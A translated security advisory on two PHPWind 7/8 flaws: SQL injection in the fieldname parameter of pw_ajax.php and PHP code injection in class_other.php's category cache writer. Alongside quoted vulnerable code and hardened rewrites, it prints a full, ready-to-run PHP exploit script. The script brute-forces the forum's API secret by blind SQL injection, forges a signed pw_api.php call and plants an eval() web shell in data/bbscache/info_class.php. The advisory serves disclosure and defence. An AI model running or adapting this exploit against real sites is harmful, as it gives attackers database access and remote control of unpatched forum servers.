PHPWind pw_ajax.php and class_other.php remote code execution vulnerability

Published: 2010-09-05
Updated: 2010-09-06

Affected systems:
PHPWind 8
PHPWind 7
Description:
PHPWind is a PHP-based web forum package that is fairly popular in China.

PHPWind does not properly filter the fieldname parameter submitted to the pcdelimg action of pw_ajax.php:

} elseif ($action == 'pcdelimg') {
    InitGP(array('fieldname','pctype'));
    InitGP(array('tid','id'),2);
    if (!$tid || !$id || !$fieldname || !$pctype) {
        echo 'fail';    // no exit here: execution continues even when a parameter is missing
    }
    $id = (int)$id;
    if ($pctype == 'topic') {
        $tablename = GetTopcitable($id);
    } elseif ($pctype == 'postcate') {
        $tablename = GetPcatetable($id);
    }

    // $fieldname is interpolated into the query text as-is; only $tid goes through pwEscape()
    $path = $db->get_value("SELECT $fieldname FROM $tablename WHERE tid=". pwEscape($tid));

fieldname is concatenated into the SELECT without any effective filtering, so the query can be rewritten into an arbitrary SELECT and data read from any table in the database.
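As an added example that is not PHPWind's own code, the following builds the pcdelimg query the way pw_ajax.php assembles it, beside a hardened version that whitelists the column name and maps pctype to a fixed table. The column and table names and the addslashes() stand-in for pwEscape() are assumptions made for illustration.

```php
<?php
// Added example, not PHPWind code: the pcdelimg query the way pw_ajax.php
// assembles it, beside a hardened version. Column/table names and the
// pwEscape() stand-in are assumptions made for illustration.

// Vulnerable: $fieldname and $tablename are interpolated into the SQL text;
// only $tid goes through the escaping helper.
function build_pcdelimg_query_vulnerable(string $fieldname, string $tablename, string $tid): string
{
    $tidEsc = "'" . addslashes($tid) . "'";   // stand-in for pwEscape() (assumption)
    return "SELECT $fieldname FROM $tablename WHERE tid=" . $tidEsc;
}

// Hardened: the column name must match a fixed whitelist, the table comes
// from a fixed map keyed by pctype, and tid is cast to int before use.
function build_pcdelimg_query_hardened(string $fieldname, string $pctype, $tid): string
{
    $allowedFields = ['ifimg', 'imgpath'];                                     // assumed column names
    $tables        = ['topic' => 'pw_pcfield', 'postcate' => 'pw_pcatefield']; // assumed table names
    if (!in_array($fieldname, $allowedFields, true)) {
        throw new InvalidArgumentException("fieldname not allowed: $fieldname");
    }
    if (!isset($tables[$pctype])) {
        throw new InvalidArgumentException("unknown pctype: $pctype");
    }
    return sprintf('SELECT `%s` FROM `%s` WHERE tid=%d', $fieldname, $tables[$pctype], (int) $tid);
}

// The advisory's PoC payload, URL-decoded, with one guessed prefix ('a') filled in.
// MySQL decodes the hex literals: 0x64625f736974656f776e65726964 = 'db_siteownerid',
// 0x6125 = 'a%', 0x612e2e = 'a..'. The '#' comments out the original FROM ... WHERE.
$payload = "db_value from pw_config where db_name like 0x64625f736974656f776e65726964"
         . " and db_value like 0x6125 union select 0x612e2e;#";

echo build_pcdelimg_query_vulnerable($payload, 'pw_pcfield', '1'), "\n";
echo build_pcdelimg_query_hardened('imgpath', 'topic', '1'), "\n";
try {
    build_pcdelimg_query_hardened($payload, 'topic', '1');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The hardened function only protects this one query; the same whitelist treatment is needed wherever a request parameter names a column or table, because string-escaping helpers such as pwEscape() only protect quoted values, never identifiers.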

In addition, class_other.php contains an arbitrary code execution vulnerability:

function threadscateGory($classdb) { // builds the thread-exchange category cache file
    $classcache = "<?php\r\n\$info_class=array(\r\n";
    foreach ($classdb as $key => $class) {
        !$class['ifshow'] && $class['ifshow'] = '0';
        $flag && $info_class[$class['cid']]['ifshow'] && $class['ifshow'] = '1';
        $class['name'] = str_replace(array('"',"'"),array("&quot;","&#39;"),$class['name']);
        // $class[cid] is written into PHP source unescaped; a quote inside it closes the string literal
        $classcache .= "'$class[cid]'=>".pw_var_export($class).",\r\n\r\n";
    }
    $classcache .= ");\r\n?>";
    // the generated file lands under the web root and is executed when requested directly
    writeover(D_P."data/bbscache/info_class.php",$classcache);
}

$class[cid] is not filtered, so a cid containing a single quote breaks out of the generated string literal and the rest of the value is written into info_class.php as PHP code. Reaching this method through pw_api.php requires the request to be signed with a secret key; the injection above is used to read that key (the PoC below pulls it from the db_siteownerid row of pw_config).
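As an added example that is not PHPWind's own code, the following shows the string-built cache from threadscateGory() next to a hardened builder, run on a constructed input carrying the cid the PoC smuggles in. PHP's var_export() stands in for PHPWind's pw_var_export(), and the example input is an assumption.

```php
<?php
// Added example, not PHPWind code: the string-built category cache from
// threadscateGory() beside a hardened builder. The input array is constructed
// here for illustration; pw_var_export() is replaced by PHP's var_export().

// Vulnerable: mirrors the advisory's loop. The key is emitted as '$class[cid]'
// by plain interpolation, so a single quote inside cid closes the literal and
// whatever follows is parsed as PHP when the file is executed.
function build_class_cache_vulnerable(array $classdb): string
{
    $code = "<?php\r\n\$info_class=array(\r\n";
    foreach ($classdb as $class) {
        $class['name'] = str_replace(['"', "'"], ['&quot;', '&#39;'], $class['name']);
        $code .= "'$class[cid]'=>" . var_export($class, true) . ",\r\n";
    }
    return $code . ");\r\n?>";
}

// Hardened: cid is cast to int before it becomes a key, and the whole array is
// emitted by var_export(), which escapes quotes and backslashes in every value.
function build_class_cache_hardened(array $classdb): string
{
    $clean = [];
    foreach ($classdb as $class) {
        $cid = (int) $class['cid'];
        $class['cid']  = $cid;
        $class['name'] = str_replace(['"', "'"], ['&quot;', '&#39;'], $class['name']);
        $clean[$cid]   = $class;
    }
    return "<?php\r\n\$info_class=" . var_export($clean, true) . ";\r\n";
}

// Constructed hostile input: the cid the PoC smuggles in through pw_api.php.
$hostile = [['cid' => "'.eval(\$_GET[c]).'abc", 'name' => 'Trade', 'ifshow' => '1']];

// The vulnerable output contains the key expression ''.eval($_GET[c]).'abc',
// i.e. a concatenation whose middle term evaluates a request parameter.
echo build_class_cache_vulnerable($hostile), "\n";

// In the hardened output (int)"'.eval(...)" is 0, and the string survives only
// as an escaped value inside var_export()'s quoted literal.
echo build_class_cache_hardened($hostile), "\n";
```

Even the hardened builder still writes executable PHP from runtime data. Storing the cache as serialized or JSON data removes the code-generation step altogether, and keeping it outside the document root stops the file from being requested directly, which is how the PoC reaches its eval().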

<* Source: 结界师

   Link: http://www.wooyun.org/bug.php?action=view&id=417
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

<?php
// PoC for the PHPWind remote command execution chain: log in as an ordinary
// user, extract the API signing secret through the pw_ajax.php injection, then
// forge a signed pw_api.php call that plants eval() in data/bbscache/info_class.php.
echo "
Info: PoC for PHPWind remote command execution
Test: exploit.php user password http://www.wooyun.org/phpwind/
";

if ($argc < 4) {   // script name + user + password + forum URL
    echo "\r\nMissing arguments\r\n";
    die();
}
$user  = $argv[1];
$pass  = $argv[2];
$pwurl = $argv[3];

$myheader = array(
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language: zh-cn,zh;q=0.5',
    'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'Referer: http://www.wooyun.org/',
    'Connection: Keep-Alive',
    'Cache-Control: no-cache',
    'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
);
$cookie = "";

// Step 1: log in and collect the session cookies from the Set-Cookie headers.
$str = curlsend("$pwurl/login.php?", "POST", 0, $myheader,
    "forward=&jumpurl=http%3A%2F%2F127.0.0.1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC", 1);
preg_match_all("/Set-Cookie:([^;]+)/is", $str, $array);
for ($i = 0; $i < count($array[1]); $i++) {
    $cookie = $cookie . ";" . $array[1][$i];
}
//echo $cookie;

// Sanity check: an <ajax> block in the reply is taken to mean the session is not valid.
$test = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, '', 1);
if (strpos($test, '<ajax>')) {
    die('Wrong username/password or other parameter');
}

// Step 2: blind SQL injection through fieldname. MySQL decodes the hex literals:
// 0x64625f736974656f776e65726964 = 'db_siteownerid', 0x25 = '%', 0x612e2e = 'a..'.
// {offset} is replaced with the hex of the secret recovered so far plus one guessed
// character, and the reply (whether it contains "pw_config") serves as a boolean oracle.
$shellcode = "action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";

$hash    = "0123456789abcdef";   // the secret is a 32-character hex string
$cracked = "";

for ($i = 0; $i < 32; $i++) {
    for ($n = 0; $n < 16; $n++) {
        $tmp = str_replace("{offset}", bin2hex($cracked . $hash[$n]), $shellcode);
        $tmp = curlsend("$pwurl/pw_ajax.php", "POST", 0, $myheader, $tmp, 0);
        if (strpos($tmp, "pw_config")) {
            echo "Cracked offset " . ($i + 1) . " :" . $hash[$n] . "\r\n";
            $cracked = $cracked . $hash[$n];
            break;
        }
    }
}
echo "Cracked magic data :" . $cracked . "\r\n";

echo "Get shell :";

// Step 3 ("another 0day"): forge a signed pw_api.php call. The signature is
// md5(sorted "key=value&" string . secret), with the secret recovered in step 2.
// The cid inside params carries a single quote, which breaks out of the
// '$class[cid]' literal that threadscateGory() writes into info_class.php.
$arg  = '';
$hack = array();
$hack['mode']   = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';
$hack['type']   = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
    if ($value && $key != 'sig') {
        $arg .= "$key=$value&";
    }
}
$arg .= 'sig=' . md5($arg . $cracked);

echo file_get_contents("$pwurl/pw_api.php?" . $arg);
echo "OK\r\n";

// Step 4: the planted file runs eval($_GET[c]) whenever it is requested.
$str = file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if (strpos($str, 'wooyun')) {
    echo "Got shell :" . "$pwurl/data/bbscache/info_class.php?c=phpinfo();";
    echo "\r\nOver!";
}

// Recursively strip slashes from a value or array of values.
function strips($param) {
    if (is_array($param)) {
        foreach ($param as $key => $value) {
            $param[$key] = strips($value);
        }
    } else {
        $param = stripslashes($param);
    }
    return $param;
}

// Minimal cURL wrapper; $header=1 returns the response headers as well
// (needed to harvest Set-Cookie after login).
function curlsend($url, $method = false, $ssl = 0, $myheader = array(), $data = '', $header = 0) {
    global $cookie;
    $ch = curl_init();

    $timeout = 0; // zero means no timeout
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, (bool) $method);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $myheader);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    if ($data) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_HEADER, $header);
    if ($ssl) {
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    }

    $handles = curl_exec($ch);
    curl_close($ch);
    //echo $handles;
    return $handles;
}

Recommendation:
Vendor patch:

PHPWind
-------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://www.phpwind.net/

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.